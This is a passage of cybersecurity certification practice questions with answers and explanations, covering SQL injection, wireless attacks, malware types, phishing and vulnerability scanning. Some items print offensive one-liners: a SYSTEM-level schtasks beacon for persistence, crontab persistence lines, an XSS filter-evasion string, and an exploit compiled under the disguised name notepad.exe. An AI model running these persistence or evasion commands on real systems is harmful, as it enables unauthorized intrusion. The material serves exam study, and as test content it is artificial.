OBJ-5.3: This is an example of a Boolean-based SQL injection. This occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. In this example, notice that the statement being parsed as part of the URL after the equal sign is equivalent to 1 or 17-7=10. This means the portion of the statement that is 17-7=10 would return a value of 1 (since it is true). Then, we are left to compute if 1 = 1, and since it does, the SQL database will treat this as a positive authentication. This is simply an obfuscation technique of a 1=1 SQL injection technique. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. A session hijacking attack consists of exploiting the web session control mechanism, normally managed via a session token. XML injection is an attack technique used to manipulate or compromise an XML application or service’s logic.

45
Q

Praveen is currently investigating activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long text strings and then began using the sudo command to carry out actions. What type of attack has just taken place?

A. Privilege escalation

B. Phishing

C. Social engineering

D. Session hijacking

A

A. Privilege escalation
Explanation
OBJ-5.2: The use of long query strings points to a buffer overflow attack, and the sudo command confirms the elevated privileges after the attack. This indicates a privilege escalation has occurred. While the other three options may have been used as an initial access vector, they cannot be confirmed based on the question’s details. Only a privilege escalation is currently verified within the scenario due to the use of sudo.

46
Q

Riaan’s company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which of the following compensating controls should Riaan recommend using until the system can be remediated?

A. IPS

B. WAF

C. Vulnerability scanning

D. Encryption

A

B. WAF
Explanation
OBJ-5.3: WAF (web application firewall) is the best option since it can serve as a compensating control and protect against web application vulnerabilities like an SQL injection until the application can be fully remediated. Vulnerability scanning could only be used to detect the issue. Therefore, it is a detective control, not a compensating control. Encryption would not be effective in stopping an SQL injection. An IPS is designed to protect network devices based on ports, protocols, and signatures. It would not be effective against an SQL injection and is not considered a compensating control for this vulnerability.

47
Q

Lamont is in the process of debugging a software program. As he examines the code, he discovers that it is miswritten. Due to the error, the code does not validate a variable’s size before allowing the information to be written into memory. Based on Lamont’s discovery, what type of attack might occur?

A. SQL injection

B. Cross-site scripting

C. Malicious logic

D. Buffer overflow

A

D. Buffer overflow
Explanation
OBJ-5.2: A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can cause an overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common security attack on data integrity. In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user’s files, change data, or disclose confidential information. Programs should use the variable size validation before writing the data to memory to ensure that the variable can fit into the buffer to prevent this type of attack.

48
Q

You are conducting a penetration test against an organization. You created an evil twin of their wireless network. Many of the organization’s laptops are now connected to your evil twin access point. You want to capture all of the victim’s web browsing traffic in an unencrypted format during your attack. Which of the following exploits should you utilize to meet this goal?

A. Perform a deauthentication attack

B. Perform an SSL downgrade attack

C. Perform a man-in-the-middle attack

D. Perform an SSL stripping attack

A

D. Perform an SSL stripping attack
Explanation
OBJ-6.1: An SSL stripping attack, also known as an HTTP downgrade attack, forces the client to communicate with the webserver in plain text (unencrypted) over HTTP instead of HTTPS. Both SSL downgrade and SSL stripping attacks are used to force the victim into using a weaker encryption mechanism (SSL downgrade to SSL-based HTTPS) or no encryption (SSL stripping to HTTP) for its web traffic.

49
Q

You have been contracted to conduct a wireless penetration test for a corporate client. Which of the following should be documented and agreed upon in the scoping documents before you begin your assessment?

A. The make and model of the wireless access points used by the client

B. The number of wireless access points and devices used by the client

C. The frequencies of the wireless access points and devices used by the client

D. The network diagrams with the SSIDs of the wireless access points used by the client

A

C. The frequencies of the wireless access points and devices used by the client
Explanation
OBJ-6.1: To ensure you are not accidentally targeting another organization’s wireless infrastructure during your penetration test, you should have the frequencies of the wireless access points and devices used by the client documented in the scoping documents. This would include whether your clients use Wireless A, B, G, N, or AC and if they are using the 2.4 GHz or 5.0 GHz spectrum if they are using Wireless N or AC.

50
Q

You are installing a new wireless network in your office building and want to ensure it is secure. Which of the following configurations would create the MOST secure wireless network?

A. WPA2 and AES

B. WPA and MAC filtering

C. WEP and TKIP

D. WPA2 and RC4

A

A. WPA2 and AES
Explanation
OBJ-6.1: The most secure wireless network configuration utilizes WPA2 with AES encryption. WPA2 is the most secure wireless encryption standard, as it has replaced both WPA and WEP. AES is a robust encryption algorithm that is used by default in the WPA2 standard.

51
Q

Your smartphone begins to receive unsolicited messages while eating lunch at the restaurant across the street from your office. What might cause this to occur?

A. Packet sniffing

B. Bluesnarfing

C. Bluejacking

D. Geotagging

A

C. Bluejacking
Explanation
OBJ-6.1: Bluejacking sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as smartphones and tablets. On the other hand, Bluesnarfing involves taking data from a smartphone or tablet over Bluetooth without permission. Bluetooth has a limited range, so the attacker is likely within 10 meters of the victimized device. Geotagging involves embedding geolocation coordinates into a piece of data (normally a photo or video). Packet sniffing is a passive method of collecting network traffic for follow-on analysis at a later time.

52
Q

During a recent penetration test, it was discovered that your company’s wireless network could be reached from the parking lot. The Chief Security Officer has submitted a change request to your network engineering team to solve this issue because he wants to ensure that the wireless network is only accessible from within the building. Based on these requirements, which of the following settings should be changed to ensure the wireless signal doesn’t extend beyond your building’s interior while maintaining a high level of availability to your users?

A. Power level

B. Channel

C. Frequency

D. Encryption

A

A. Power level
Explanation
OBJ-6.1: The power level should be reduced for the radio transmitter in the wireless access points. With a reduced power level, the signal will not travel as far, which can ensure the signal remains within the building’s interior only. The other options, if changed, would affect the availability of the network to the currently configured users and their devices.

53
Q

You are conducting a physical penetration test against an organization. You followed an employee to the coffee shop next door, and while they were ordering, you got within 1 foot of them to electronically capture their proximity badge. Which of the following exploits are you planning to use?

A. Session hijacking

B. Bluesnarfing

C. RFID cloning

D. Credential harvesting

A

C. RFID cloning
Explanation
OBJ-6.1: Radio-frequency identification (RFID) is a standard for identifying and keeping track of an object’s physical location through the use of radio waves. RFID cloning is the act of copying authentication data from an RFID badge’s microchip to another badge. In an attack scenario, badge cloning is useful because it enables the attacker to obtain authorization credentials without actually stealing a physical badge from the organization. Badge cloning can be done through handheld RFID writers, which are inexpensive and easy to use. You simply hold the badge up to the RFID writer device, press a button to copy its tag’s data, then hold a blank badge up to the device and write the copied data. RFID cloning tools can read the data like any normal RFID reader would and be located up to several feet away or inside a bag.

54
Q

Which attack utilizes a wireless access point made to look as if it belongs to the network to eavesdrop on the wireless traffic?

A. Evil twin

B. Rogue access point

C. WEP attack

D. Wardriving

A

A. Evil twin
Explanation
OBJ-6.1: An evil twin is meant to mimic a legitimate hotspot provided by a nearby business, such as a coffee shop that provides free Wi-Fi access to its patrons. The evil twin is the wireless LAN equivalent of the phishing scam. This type of attack may be used to steal the passwords of unsuspecting users by monitoring their connections or phishing, which involves setting up a fraudulent web site and luring people there.

55
Q

You are conducting a wireless penetration test against an organization. During your attack, you created an evil twin of their wireless network. Many of the organization’s laptops are now connected to your evil twin access point. Which of the following exploits should you utilize next to gather credentials from the victims browsing the internet through your access point?

A. Fragmentation attack

B. Deauthentication attack

C. Karma attack

D. Downgrade attack

A

D. Downgrade attack
Explanation
OBJ-6.1: A downgrade attack forces a client to use a weaker SSL version that the attacker can crack. Since the devices are connected through your access point, you can establish a weaker SSL-based HTTPS connection between their web browser and the actual web server they wanted. This forcing of the client to use a weaker version is known as a downgrade attack, and it allows the attacker to capture the packets and later crack them offline since SSL-based HTTPS is weak enough to crack due to vulnerabilities in its design.

56
Q

Which of the following is the biggest weakness with ICS and SCADA systems in a network?

A. Cybersecurity experts don’t know how to secure ICS/SCADA

B. These systems are difficult to retrofit with modern security

C. ICS/SCADA must be connected to the internet to function

D. They are patched using standard vendor OS patches

A

B. These systems are difficult to retrofit with modern security
Explanation
OBJ-7.2: Industrial control system (ICS) and supervisory control and data acquisition (SCADA) systems were developed many years before security standards were established and integrated into their design. Many of these older systems date back to the 1970s and are still in use today. Over time, these systems were incorporated into the organization’s TCP/IP data networks, which provides a huge exploitation area for penetration testers and attackers alike. Many ICS and SCADA vendors are slow to implement security measures since their systems cannot be easily retrofitted with the newer security required. Therefore, ICS and SCADA systems should ALWAYS be isolated from production networks and segmented into their own logical network. For example, some ICS/SCADA systems use a proprietary operating system. More modern ICS/SCADA systems operate using a version of Windows. However, many still use Windows XP, making them much more vulnerable since they cannot be upgraded to Windows 10 without hardware replacement.

57
Q

Sarah is conducting a penetration test against Dion Training’s Windows-based network. This engagement aims to simulate an advanced persistent threat and demonstrate persistence for 30 days without their system administrators identifying the intrusion. Which of the following commands should Sarah use to run a script that beacons back to her computer every 20 minutes?

A. schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM

B. (crontab -l ; echo "*/20 * * * * /tmp/beacon")| crontab -

C. schtasks /create /tn beacon /tr /tmp/beacon /sc MINUTE /mo 20 /ru SYSTEM

D. (crontab -l ; echo "* */20 * * * /tmp/beacon")| crontab -

A

A. schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM
Explanation
OBJ-3.2: A scheduled task or scheduled job is an instance of execution, like initiating a process or running a script, that the system performs on a set schedule. Once the task executes, it can prompt the user for interaction or run silently in the background; it all depends on what the task is set up to do. Scheduled tasks in Windows use the schtasks command. The correct answer for this persistence is to enter the command “schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM”, which will create a task called “beacon” that runs the script at “C:\temp\beacon.bat” every 20 minutes as the SYSTEM-level user. The other variant of schtasks is incorrect because it uses a Linux-based file directory structure to reference the script location and would fail to run in Windows. The crontab options are used in Linux, not in Windows.

58
Q

A user has reported that their workstation is running very slowly. A technician begins to investigate the issue and notices a lot of unknown processes running in the background. The technician determines that the user has recently downloaded a new application from the internet and may have become infected with malware. Which of the following types of infections does the workstation MOST likely have?

A. Rootkit

B. Keylogger

C. Trojan

D. Ransomware

A

C. Trojan
Explanation
OBJ-3.3: A trojan is a type of malware that looks legitimate but can take control of your computer. A Trojan is designed to damage, disrupt, steal, or in general, inflict some other harmful action on your data or network. The most common form of a trojan is a Remote Access Trojan (RAT), which allows an attacker to control a workstation or steal information remotely. To operate, a trojan will create numerous processes that run in the background of the system.

59
Q

Dion Training has applied a new Group Policy to all student accounts that will lock out any account in which the student enters their password incorrectly 3 times in a row. Once the account is locked out, the student must wait 15 minutes before they can attempt to log in again. What type of attack is this mitigation strategy trying to prevent?

A. Privilege escalation

B. Brute force attack

C. Spoofing

D. Man-in-the-Middle

A

B. Brute force attack
Explanation
OBJ-3.2: Since the policy will lock out the student for 15 minutes between attempts, it is a valid mitigation technique against a brute force attack. By extending the waiting period, the attacker’s brute force attempts are less effective.

60
Q

Your network security manager wants a monthly report of the security posture of all the assets on the network (e.g., workstations, servers, routers, switches, firewalls). The report should include any feature of a system or appliance that is missing a security patch, OS update, or other essential security feature and its risk severity. Which solution would work best to find this data?

A. Security policy

B. Penetration test

C. Virus scan

D. Vulnerability scanner

A

D. Vulnerability scanner
Explanation
OBJ-3.1: A vulnerability scanner is a computer program designed to assess computers, computer systems, networks, or applications for weaknesses. Most vulnerability scanners also create an itemized report of their findings after the scan.

61
Q

Jennifer decided that the licensing cost for a piece of video editing software was too expensive. Instead, she decided to download a keygen program to generate her own license key and install a pirated version of the editing software. After she runs the keygen, a license key is created, but her system performance becomes very sluggish, and her antimalware suite begins to display numerous alerts. Which type of malware might her computer be infected with?

A. Worm

B. Trojan

C. Adware

D. Logic bomb

A

B. Trojan
Explanation
OBJ-3.3: A trojan is a program in which malicious or harmful code is contained inside an apparently harmless program. In this example, the harmless program is the key generator (which does create a license key). It also has malicious code inside it (causing the additional alerts from the antimalware solution). Likely, this keygen has an embedded virus or remote access trojan (RAT) in its programming.

62
Q

Which of the following open source tools allows a penetration tester to conduct vulnerability scans against a company’s infrastructure?

A. Peach

B. Wireshark

C. OpenVAS

D. CeWL

A

C. OpenVAS
Explanation
OBJ-3.1: OpenVAS (Open Vulnerability Assessment System) is an open-source software framework for vulnerability scanning and management that can scan for vulnerabilities, misconfigurations, default passwords, and susceptibility to denial of service (DoS) attacks. Wireshark is an open-source network protocol analyzer used to sniff many traffic types, re-create entire TCP sessions, and capture copies of files transmitted on the network. Peach is a dynamic application security testing tool used to conduct fuzzing. CeWL is a Ruby app that crawls websites to generate word lists that can be used with password crackers such as John the Ripper.

63
Q

A cybersecurity analyst is applying for a new job with a penetration testing firm. He received the job application as a secured Adobe PDF file, but unfortunately, the firm locked the file with a password so the potential employee cannot fill in the application. Instead of asking for an unlocked copy of the document, the analyst decides to write a script in Python to attempt to unlock the PDF file by using passwords from a list of commonly used passwords until he can find the correct password or attempts every password in his list. Based on this description, what kind of cryptographic attack did the analyst perform?

A. Man-in-the-middle attack

B. Brute-force attack

C. Dictionary attack

D. Session hijacking

A

C. Dictionary attack
Explanation
OBJ-3.2: A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary. The key to answering this question is that they were using passwords from a list. In cryptography, a brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. A dictionary attack is a specific form of a brute-force attack that uses a list. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the webserver. A man-in-the-middle attack (MITM), also known as a hijack attack, is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other.

64
Q

What kind of security vulnerability would a newly discovered flaw in a software application be considered?

A. Input validation flaw

B. HTTP header injection vulnerability

C. Zero-day vulnerability

D. Time-to-check to time-to-use flaw

A

C. Zero-day vulnerability
Explanation
OBJ-3.3: A zero-day vulnerability refers to a hole in software unknown to the vendor and newly discovered. This security hole can become exploited by hackers before the vendor becomes aware of it and can fix it. An input validation attack is any malicious action against a computer system that involves manually entering strange information into a normal user input field that is successful due to an input validation flaw. HTTP header injection vulnerabilities occur when user input is insecurely included within server response headers. The time of check to time of use is a class of software bug caused by changes in a system between checking a condition (such as a security credential) and using the check’s results and the difference in time passed. This is an example of a race condition.

65
Q

Which of the following techniques does a vulnerability scanner use to detect a vulnerability on a specific service?

A. Port scanning

B. Banner grabbing

C. Fuzzing

D. Analyzing the response received from the service when probed

A

D. Analyzing the response received from the service when probed
Explanation
OBJ-3.1: When a vulnerability scanner analyzes the response received from services during a scan or probe, it can determine if the vulnerability exists on the given service on a particular host. Port Scanning is the name for the technique used to identify open ports and services available on a network host. Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. Banner grabbing is a technique used to gain information about a computer system on a network and the services running on its open ports.

66
Q

You are working as a penetration tester and have discovered a new method of exploiting a vulnerability within the Windows 10 operating system. You conduct some research online and discover that a security patch against this particular vulnerability doesn’t exist yet. Which type of threat would this BEST be categorized as?

A. Zero-day

B. DDOS

C. Brute force

D. Spoofing

A

A. Zero-day
Explanation
OBJ-3.3: A zero-day attack happens once that flaw, or software/hardware vulnerability, is exploited, and attackers release malware before a developer has an opportunity to create a patch to fix the vulnerability, hence the term zero-day.

67
Q

Which of the following vulnerability scans would provide the best results if you want to determine if the target’s configuration settings are correct?

A. Non-credentialed scan

B. Credentialed scan

C. External scan

D. Internal scan

A

B. Credentialed scan
Explanation
OBJ-3.1: Credentialed scans log into a system and retrieve their configuration information. Therefore, it should provide you with the best results. Non-credentialed scans rely on external resources for configuration settings that can be altered or incorrect. The scanner’s network location does not directly impact the ability to read the configuration information, so it would not make a difference if you conducted an external or internal scan.

68
Q

Jason is conducting a physical penetration test against a company. His objective is to enter the server room that is protected by a lock using a fingerprint reader. Jason attempts to use his finger to open the lock several times without success. He then turns his finger 45 degrees to the left, and the lock authenticates him. What is MOST likely the reason the lock opened?

A. The crossover error rate is tuned towards true negatives

B. The biometric lock is set to fail open after five invalid attempts

C. The biometric lock is set to fail closed after five invalid attempts

D. The crossover error rate is tuned towards false positives

A

D. The crossover error rate is tuned towards false positives
Explanation
OBJ-3.2: A biometric lock is difficult to bypass unless the installer incorrectly configures it. If the biometric lock has a high false acceptance rate, it will allow unauthorized people to open the door. The crossover error rate (CER) is the point where the false acceptance and false rejection rates are equal. When charted on a graph, this point can lean more towards accepting false positives or rejecting true positives. If it leans more towards accepting false positives, the sensitivity has decreased to allow less frustration for its users.

69
Q

You are logged into the Windows command prompt and want to find what systems are alive in a portion of a Class B network (172.16.0.0/24) using ICMP. What command would best accomplish this?

A. ping 172.16.0.0

B. ping 172.16.0.255

C. for %X in (1 1 255) do PING 172.16.0.%X

D. for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /I “Reply”

A

D. for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /I “Reply”
Explanation
OBJ-3.2: The Windows command line does support some fundamental scripting, as shown in this answer. Use an iterative variable to set the starting value (start#) and then step through a set range of values until the value exceeds the set ending value (end#). /L will execute the iterative by comparing start# with end#. If start# is less than end#, the command will execute. When the iterative variable exceeds end#, the command shell exits the loop. You can also use a negative step# to step through a range in decreasing values. For example, (1,1,5) generates the sequence 1 2 3 4 5 and (5,-1,1) generates the sequence (5 4 3 2 1). The syntax is: “for /L %variable in (start# step# end#) do command [CommandLineOptions].”

70
Q

An employee contacts the service desk because they cannot open an attachment they receive in their email. The service desk agent conducts a screen sharing session with the user and investigates the issue. The agent notices that the attached file is named Invoice1043.pdf, and a black pop-up window appears and then disappears quickly when the attachment was double-clicked. Which of the following is most likely causing this issue?

A. The user doesn’t have a PDF reader installed on their computer

B. The attachment is using a double file extension to mask its identity

C. The file contains an embedded link to a malicious website

D. The email is a form of spam and should be deleted

A

B. The attachment is using a double file extension to mask its identity
Explanation
OBJ-3.3: The message contains a file attachment hoping that the user will execute or open it. The attachment’s nature might be disguised by formatting tricks such as using a double file extension, such as Invoice1043.pdf.exe, where the user only sees the first extension since .exe is a known file type in Windows. This would explain the black popup window that appeared and then disappeared, especially if the exe file was running a command-line tool. This file is most likely not a PDF, so there is no need for a PDF reader. Additionally, most modern web browsers, such as Chrome and Edge, can open PDF files by default for the user. The file would not contain an embedded link since an embedded link is another popular attack vector that embeds a link to a malicious site within the email body, not within the file. This email is likely not spam and would be better categorized as a phishing attempt instead.

71
Q

During your annual cybersecurity awareness training in your company, the instructor states that employees should be careful about what information they post on social media. According to the instructor, if you post too much personal information on social media, such as your name, birthday, hometown, and other personal details, it is much easier for an attacker to conduct which type of attack to break your passwords?

A. Birthday attack

B. Brute force attack

C. Cognitive password attack

D. Rainbow table attack

A

C. Cognitive password attack
Explanation
OBJ-3.2: A cognitive password is a form of knowledge-based authentication that requires a user to answer a question, presumably something they intrinsically know, to verify their identity. If you post a lot of personal information about yourself online, this password type can easily be bypassed. For example, during the 2008 elections, Vice Presidential candidate Sarah Palin’s email account was hacked because a high schooler used the “reset my password” feature on Yahoo’s email service to reset her password using the information that was publicly available about Sarah Palin (like her birthday, high school, and other such information).

72
Q

Which of the protocols listed is NOT likely to trigger a vulnerability scan alert when used to support a virtual private network (VPN)?

A. IPSec

B. SSLv2

C. PPTP

D. SSLv3

A

A. IPSec
Explanation
OBJ-3.1: IPSec is the most secure protocol that works with VPNs. The use of PPTP and SSL is discouraged for VPN security. Due to this, PPTP and SSL for a VPN will likely alert during a vulnerability scan as an issue to be remediated.

73
Q

A security engineer is using the Kali Linux operating system and is writing exploits in C++. What command should they use to compile their new exploit and name it notepad.exe?

A. g++ exploit.cpp -o notepad.exe

B. g++ exploit.py -o notepad.exe

C. g++ -i exploit.pl -o notepad.exe

D. g++ –compile -i exploit.cpp -o notepad.exe

A

A. g++ exploit.cpp -o notepad.exe
Explanation
OBJ-3.2: g++ is a free C++ compiler that is available across a wide variety of operating systems and is installed by default as part of Kali Linux. The proper syntax to compile a C++ file (*.cpp) is “g++ filename -o outputfile”, so “g++ exploit.cpp -o notepad.exe” is correct.

74
Q

As a cybersecurity analyst conducting vulnerability scans, you have just completed your first scan of an enterprise network comprising over 10,000 workstations. As you examine your findings, you note that you have less than 1 critical finding per 100 workstations. Which of the following statements BEST explains these results?

A. An uncredentialed scan of the network was performed

B. The network has an exceptionally strong security posture

C. The scanner failed to connect with the majority of workstations

D. The scanner was not compatible with the devices on your network

A

A. An uncredentialed scan of the network was performed
Explanation
OBJ-3.1: Uncredentialed scans are generally unable to detect many vulnerabilities on a device. When conducting an internal assessment, you should perform an authenticated (credentialed) scan of the environment to most accurately determine the network’s vulnerability posture. In most enterprise networks, if a vulnerability exists on one machine, it also exists on most other workstations since they use a common baseline or image. If the scanner failed to connect to the workstations, an error would have been generated in the report.

75
Q

What programming language is most vulnerable to buffer overflow attacks?

A. Swift

B. C++

C. Python

D. Java

A

B. C++
Explanation
OBJ-3.2: Many memory manipulation functions in C and C++ do not perform bounds checking and can easily overwrite the allocated bounds of the buffers they operate upon. Newer languages like Python, Java, and Swift do a better job of protecting against a buffer overflow, but even they are not perfect.

76
Q

What type of malicious application does not require user intervention or another application to act as a host to replicate?

A. Macro

B. Worm

C. Trojan

D. Virus

A

B. Worm
Explanation
OBJ-3.3: A worm is a self-replicating type of malware that does not require user intervention or another application to act as a host for it to replicate. Viruses and Macros require user intervention to spread, and Trojans are hosted within another application that appears harmless.

77
Q

What should a vulnerability report include if a cybersecurity analyst wants it to reflect the assets scanned accurately?

A. Processor utilization

B. Virtual hosts

C. Organizational governance

D. Log disposition

A

B. Virtual hosts
Explanation
OBJ-3.1: Vulnerability reports should include both the physical hosts and the virtual hosts on the target network. A common mistake of new cybersecurity analysts is to include only the physical hosts, thereby missing many network assets.

78
Q

You are working as a network administrator and are worried about the possibility of an insider threat. You want to enable a security feature that would remember the Layer 2 address first connected to a particular switch port to prevent someone from unplugging a workstation from the switch port and connecting their own laptop to that same switch port. Which of the following security features would BEST accomplish this goal?

A. NAC

B. Sticky MAC

C. 802.1x

D. ACL

A

B. Sticky MAC
Explanation
OBJ-4.1: Persistent MAC learning, also known as Sticky MAC, is a port security feature that enables an interface to retain dynamically learned MAC addresses when the switch is restarted or if the interface goes down and is brought back online. This is a security feature that can be used to prevent someone from unplugging their office computer and connecting their own laptop to the network jack without permission since the switch port connected to that network jack would only allow the computer with the original MAC address to gain connectivity using Sticky MAC.

79
Q

An attacker was able to gain access to your organization’s network closet while posing as an HVAC technician. While he was there, he installed a network sniffer in your switched network environment. The attacker now wants to sniff all of the packets in the network. What attack should he use?

A. Fraggle

B. MAC Flood

C. Smurf

D. Tear Drop

A

B. MAC Flood
Explanation
OBJ-4.1: MAC flooding is a technique employed to compromise the security of switched network devices. The attack forces legitimate MAC addresses out of the switch’s MAC address table and forces a unicast flooding behavior, potentially sending sensitive information to portions of the network where it is not normally intended to go. Essentially, since the switch’s MAC address table is flooded with bad information, the switch could fail open and begin to act like a hub, broadcasting all the frames out of every port. This would allow the attacker to sniff all network packets since he is connected to one of those switch ports. A fraggle attack is a denial-of-service (DoS) attack that involves sending a large amount of spoofed UDP traffic to a router’s broadcast address within a network. A teardrop attack is a denial-of-service (DoS) attack that involves sending fragmented TCP packets to a target machine. The Smurf attack is a distributed denial-of-service attack. Large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim’s spoofed source IP are broadcast to a computer network using an IP broadcast address.

80
Q

Which device actively defends the network by detecting threats and shutting down ports or changing configurations to prevent attacks?

A. Honeypot

B. IPS

C. Firewall

D. IDS

A

B. IPS
Explanation
OBJ-4.5: Intrusion Prevention Systems (IPS) can reconfigure themselves based on the threats experienced. Firewalls maintain a static configuration.

81
Q

You are conducting a penetration test and planning to use a cross-site scripting attack. During your reconnaissance, you determined that the system performs input validation using REGEX to prevent any strings that contain the term “[Ss][Cc][Rr][Ii][Pp][Tt]” in the input. To bypass this input validation, which of the following variations of the script tag should you utilize? (note: in options A and B there is no space after the < character)

A. < script>

B. < SCRIPT>

C. <$cript>

D. <%53CRIPT>

A

D. <%53CRIPT>
Explanation
OBJ-4.5: Since cross-site scripting (XSS) relies on < script> and < /script> HTML tags to launch, the system administrators had a good idea of creating input validation using a REGEX for those keywords. Unfortunately, they forgot to include a more inclusive version of this REGEX to catch all variants. For example, simply using [Ss][Cc][Rr][Ii][Pp][Tt] would have been much more secure, but even this would miss %53CRIPT, which would evade this filter. To catch all the letter S variants, you would need to use [%53%73Ss], which includes the capital S in hex code, the lower case s in hex code, the capital S, and the lowercase s. As a penetration tester, it is important to remember that you can evade weak input validation using ASCII encoded characters, like %53 for the S character. As a cybersecurity analyst, you must build good input validations into your systems to prevent these types of attacks.

82
Q

You want to exploit the NETBIOS name service on a Windows-based network. Which of the following tools should you use?

A. Arpspoof

B. Nessus

C. John the Ripper

D. Responder

A

D. Responder
Explanation
OBJ-4.4: Responder provides a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS (NETBIOS), POP, IMAP, SMTP, and SQL queries to recover sensitive information such as user names and passwords. Responder is configured to listen for LLMNR/NBNS queries and respond with itself as the desired destination. When the client then tries to connect, it prompts the user to log on based on the client’s protocol, thus harvesting the user’s credentials.

83
Q

Which of the following types of attacks occurs when an attacker attempts to gain confidential information or login credentials by sending targeted emails to a specific set of recipients within an organization?

A. Phishing

B. Zero-day

C. Spear phishing

D. Spoofing

A

C. Spear phishing
Explanation
OBJ-4.2: Spear phishing is the fraudulent practice of sending emails from a seemingly known or trusted sender to induce targeted individuals to reveal confidential information. The key to answering this question is that the attack was focused on a targeted set of people, not just an indiscriminate large group of random people.

84
Q

You are working at the service desk and just received the following email from an end-user who believes it is suspicious:

From: user@diontraining.com
To: abuse@diontraining.com
Subject: You won a free iPhone!

You have won a brand new iPhone!
Just click the following link to provide your address so we can ship it out to you this afternoon: (http://www.freephone.io:8080/winner.php)
*******

How should you classify this email?

A. Spearphishing

B. Malware

C. Phishing

D. Spoofing

A

C. Phishing
Explanation
OBJ-4.2: This is an example of a phishing campaign. Phishing refers to obtaining user authentication or financial information through a fraudulent request for information. Phishing is specifically associated with emailing users with a link to a faked site (or some other malware that steals the information they use to try to authenticate). Spear phishing is an email or electronic communications scam targeted towards a specific individual, organization, or business. In this example, the specific user wasn’t clearly targeted by their name or by their association with a particular store, company, or website.

85
Q

While investigating a data breach, you discover that the account credentials used belonged to an employee who was fired several months ago for misusing company IT systems. Apparently, the IT department never deactivated the employee’s account upon their termination. Which of the following categories would this breach be classified as?

A. Insider Threat

B. Zero-day

C. Known threat

D. Advanced persistent threat

A

A. Insider Threat
Explanation
OBJ-4.2: An insider threat is any current or former employee, contractor, or business partner who has or had authorized access to an organization’s network, system, or data and intentionally exceeded or misused that access in a manner that negatively affected the confidentiality, integrity, or availability of the organization’s information or information systems. Based on the details provided in the question, it appears the employee’s legitimate credentials were used to conduct the breach. This would be classified as an insider threat. A zero-day is a vulnerability in software unpatched by the developer or an attack that exploits such a vulnerability. A known threat is a threat that can be identified using a basic signature or pattern matching. An advanced persistent threat (APT) is an attacker with the ability to obtain, maintain, and diversify access to network systems using exploits and malware.

86
Q

A client is concerned about a hacker compromising a network to gain access to confidential research data. What could be implemented to redirect any attackers on the network?

A. DMZ

B. Botnet

C. Content filter

D. Honeypot

A

D. Honeypot
Explanation
OBJ-4.5: A honeypot is a computer security mechanism set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems. Generally, a honeypot consists of data that appears to be a legitimate part of the site but is actually isolated and monitored and seems to contain information or a resource of value to attackers, who are then blocked.

87
Q

You are working at the service desk as a network security technician and just received the following email from an end-user who believes a phishing campaign is being attempted.

From: user@diontraining.com
To: abuse@diontraining.com
Subject: You won a free iPhone!

Dear Susan,
You have won a brand new iPhone!
Just click the following link to provide your address so we can ship it out to you this afternoon: (http://www.freephone.io:8080/winner.php)
*******

What should you do to prevent any other employees from accessing the link in the email above while still allowing them access to any other webpages at the domain freephone.io?

A. Add http://www.freephone.io:8080/winner.php to the browser’s group policy block list

B. Add DENY TCP http://www.freephone.io ANY EQ 8080 to the firewall ACL

C. Add DENY IP ANY ANY EQ 8080 to the IPS filter

D. Add http://www.freephone.io:8080/winner.php to the load balancer

A

A. Add http://www.freephone.io:8080/winner.php to the browser’s group policy block list
Explanation
OBJ-4.2: There are two ways to approach this question. First, you can consider which is the right answer (if you know it). By adding the full URL of the phishing link to the browser’s group policy block list (or black hole list), the specific webpage will be blocked from being accessed by the employees while allowing the rest of the freephone.io domain to be accessible. Now, why not just block the entire domain? Well, maybe the rest of the domain isn’t suspect, but just this one page is. (For example, maybe someone is using a legitimate site like GitHub to host their phishing campaign. Therefore you only want to block their portion of GitHub.) The second approach to answering this question would be to rule out the incorrect answers. If you used DENY TCP to the firewall ACL answer, you would block all access to the domain, blocking legitimate traffic as well as possible malicious activity. If you used the DENY IP ANY ANY to filter traffic at the IPS, you would block any IP traffic to ANY website over port 8080. If you added the link to the load balancer, this would not block it either. Therefore, we are only left with the correct answer of using a group policy in this case.

88
Q

Mallory is unhappy with her job at a large beverage company. She decides to steal sensitive information about the company’s proprietary formula for a new energy drink. She installs a keylogger onto some of the product team’s workstations, which then emails out the information to her personal email account each evening so she can post the information to WikiLeaks. How would you best classify Mallory and her actions?

A. Social engineering

B. Insider threat

C. Logic bomb

D. DoS

A

B. Insider threat
Explanation
OBJ-4.2: Mallory is considered an insider threat in this scenario. An insider threat is a malicious threat to an organization that comes from people within the organization, such as employees, former employees, contractors or business associates, who have inside information concerning the organization’s security practices, data, and computer systems. Regardless of her method of stealing the information, the key to this question resides in the fact that she is an employee of the company doing something malicious.

89
Q

